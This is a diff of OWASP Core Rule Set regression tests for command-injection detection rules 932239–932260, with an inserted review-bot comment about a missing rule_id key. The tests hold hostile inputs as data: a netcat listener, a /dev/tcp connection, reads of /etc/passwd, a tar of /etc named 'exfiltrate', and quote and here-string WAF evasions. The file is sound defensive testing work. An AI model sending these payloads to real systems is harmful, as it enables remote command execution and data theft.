test on known user-agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "Cpanel-HTTP-Client/1.0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - no_log_contains: id "932239" - - test_title: 932239-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + no_log_contains: id "932239" + - test_id: 18 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: a=nc&&$a -nlvp 555 - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: a=nc&&$a -nlvp 555 + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 19 desc: "IXMZUXBG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: a=nc&&$a -nlvp 555 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932239" - - test_title: 932239-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: 
"OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: a=nc&&$a -nlvp 555 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932239" + - test_id: 20 desc: "FP with word comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=comment" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=comment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 21 desc: "FP with word settings" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "https://example.com/?args=settings" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "https://example.com/?args=settings" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 22 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "environment" - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "environment" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 23 desc: "FP with word environment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=environment" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=environment" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 24 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "performance" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "performance" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: 
HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 25 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=performance" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=performance" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932239" + - test_id: 26 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "env --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "env --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 27 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=env --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - 
output: - log_contains: id "932239" - - test_title: 932239-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=env --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 28 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "perf --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "perf --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 29 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=perf --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=perf --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "932239" + - test_id: 30 
desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ";`cat<<()' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=pi>()ng%20127.0.0.1" - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-16 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=pi>()ng%20127.0.0.1" + version: "HTTP/1.1" + output: + log_contains: id "932240" + - test_id: 16 desc: FP against single quote inside string stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-17 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. 
+ version: "HTTP/1.1" + output: + no_log_contains: id "932240" + - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=kill '-'9 - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-18 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=kill '-'9 + version: "HTTP/1.1" + output: + log_contains: id "932240" + - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-19 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. 
+ version: "HTTP/1.1" + output: + no_log_contains: id "932240" + - test_id: 19 desc: "Detect quote evasion: py''thon" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=py''thon -c "print('attack')" - version: "HTTP/1.1" - output: - log_contains: id "932240" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=py''thon -c "print('attack')" + version: "HTTP/1.1" + output: + log_contains: id "932240" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 093f360c7..ccb8dfd65 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml 
@@ -1,224 +1,209 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, azurit" - enabled: true - name: "932250.yaml" description: | Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs tests: - - test_title: 932250-1 + - test_id: 1 desc: Negative test for excluded command `tar` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + 
version: "HTTP/1.1" + output: + no_log_contains: id "932250" # FIXME: 932150 already had this false positive. Fix after rework - # - test_title: 932250-3 + # - test_id: 3 # stages: - # - stage: - # input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" - - test_title: 932250-4 + # - input: + # dest_addr: "127.0.0.1" + # method: "POST" + # port: 80 + # headers: + # User-Agent: "OWASP CRS test agent" + # Host: "localhost" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + # uri: "/post" + # version: "HTTP/1.1" + # output: + # no_log_contains: id "932250" + - test_id: 4 desc: Negative test for excluded command `c99` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' 
+ uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=ksh -c "curl google."COM - uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" - version: HTTP/1.0 - output: - log_contains: id "932250" - - test_title: 932250-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=ksh -c "curl google."COM + uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" + version: HTTP/1.0 + output: + log_contains: id "932250" + - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." 
+ version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 7 desc: "'ls' direct command injection" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20-l%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20-l%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20/etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20foo%20bar" - version: "HTTP/1.1" - output: - 
log_contains: id "932250" - - test_title: 932250-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20foo%20bar" + version: "HTTP/1.1" + output: + log_contains: id "932250" + - test_id: 10 desc: "'ls' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=kills%20foo%20bar" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=kills%20foo%20bar" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 11 desc: "FP for 'sh' without word boundary" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?show_comments_cookies_opt_in=true" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?show_comments_cookies_opt_in=true" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 12 desc: "FP for 
'ls' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-13 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" + - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "932250" 
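Review bot: The new side of this hunk does not appear to add a file-level `rule_id` key, whereas the sibling 932260 hunk in this commit inserts `+rule_id: 932260` directly after `description`; once `test_title: 932250-N` is reduced to a bare `test_id: N`, that key is the only place the tests are bound to the rule they guard. If the new format relies on `rule_id` (as the 932260 change suggests), consider adding `rule_id: 932250` after the `description` block so the runner can tie ids 1–13 (3 stays commented out under the FIXME) to rule 932250. The diff lines are collapsed on this page, so confirm against the rendered file before acting on it. Separately, test 1 still posts `932250-2=tar ...` — a pre-existing parameter-name mismatch that is harmless to the assertion but worth aligning while the ids are being renumbered.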
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 99184896c..600f3e6de 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml 
@@ -1,778 +1,732 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - enabled: true - name: "932260.yaml" description: "Tests to trigger or not trigger rule 932260" +rule_id: 932260 tests: - - test_title: 932260-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - 
